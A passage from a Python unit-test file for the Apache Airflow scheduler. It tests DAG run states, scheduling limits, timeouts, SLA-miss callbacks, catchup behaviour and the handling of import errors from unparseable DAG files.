self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if it is after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if it times out
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_dag_runs has been reached and dagrun_timeout is not reached
Test that a dagrun will be scheduled if max_dag_runs has been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks that the scheduler does not put a task in limbo when the task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# should not re-queue the task while it is still present in the executor
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# now that the executor has cleared, the task should be allowed to re-queue
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except (IndexError, TypeError):
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
three_minutes_ago = now - datetime.timedelta(minutes=3)
two_hours_and_three_minutes_ago = three_minutes_ago - datetime.timedelta(hours=2)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'no_catchup_test1'
DAG_NAME2 = 'no_catchup_test2'
DAG_NAME3 = 'no_catchup_test3'
DAG_NAME4 = 'no_catchup_test4'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
default_catchup = configuration.getboolean('scheduler', 'catchup_by_default')
# Test configs have catchup by default ON
self.assertEqual(default_catchup, True)
# Correct default?
self.assertEqual(dag1.catchup, True)
dag2 = DAG(DAG_NAME2,
schedule_interval='* * * * *',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag2)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag2)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag2)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag2.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag2.clear()
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 3 minutes, not 6 hours ago
self.assertGreater(dr.execution_date, three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = DAG(DAG_NAME3,
schedule_interval='@hourly',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag3)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag3)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag3)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag3.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag3.clear()
dr = None
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last two hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_and_three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
# check @once schedule
dag4 = DAG(DAG_NAME4,
schedule_interval='@once',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag4)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag4)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag4)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag4.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag4.clear()
dr = None
dr = scheduler.create_dag_run(dag4)
# We had better get a dag run
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
